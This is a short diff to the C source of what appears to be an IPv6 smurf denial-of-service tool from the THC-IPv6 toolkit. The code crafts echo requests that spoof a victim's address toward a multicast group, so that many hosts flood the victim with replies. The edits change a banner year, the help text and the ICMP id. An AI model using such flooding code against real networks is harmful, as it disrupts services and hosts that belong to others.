@@ -10,14 +10,12 @@
 #include <pcap.h>
 #include "thc-ipv6.h"
 
-extern int debug;
-
 void help(char *prg) {
-  printf("%s %s (c) 2011 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s [-r] interface victim-ip [multicast-network-address]\n\n", prg);
+  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("Syntax: %s interface victim-ip [multicast-network-address]\n\n", prg);
   printf("Smurf the target with icmp echo replies. Target of echo request is the\n");
   printf("local all-nodes multicast address if not specified\n");
-  printf("Use -r to use raw mode.\n\n");
+//  printf("Use -r to use raw mode.\n\n");
   exit(-1);
 }
 
@@ -48,7 +46,7 @@ int main(int argc, char *argv[]) {
   memset(buf, 'A', 16);
   if ((pkt = thc_create_ipv6(interface, PREFER_GLOBAL, &pkt_len, victim6, multicast6, 0, 0, 0, 0, 0)) == NULL)
     return -1;
-  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xdeadbeef, (unsigned char *) &buf, 16, 0) < 0)
+  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
     return -1;
   if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
     fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
